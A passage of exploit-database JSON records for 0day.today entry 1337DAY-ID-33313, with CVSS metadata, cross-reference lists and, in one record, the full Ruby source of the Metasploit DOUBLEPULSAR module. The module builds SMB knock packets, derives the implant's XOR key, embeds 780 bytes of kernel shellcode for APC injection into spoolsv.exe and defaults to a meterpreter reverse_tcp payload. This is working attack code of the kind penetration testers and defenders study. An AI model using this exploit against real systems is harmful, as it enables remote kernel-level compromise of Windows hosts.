#"}, "lastseen": "2021-10-20T22:23:49", "differentElements": ["sourceData"], "edition": 51}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "1e163b311986855833cd4b6bf433d046", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-21T22:28:12", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27613"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96704", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-10-21T22:28:12", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-10-21T22:28:12", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-22] #"}, "lastseen": "2021-10-21T22:28:12", "differentElements": ["sourceData"], "edition": 52}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "352579dc5d641f54ed1b328f46037dc4", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-23T18:17:17", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "nessus", "idList": 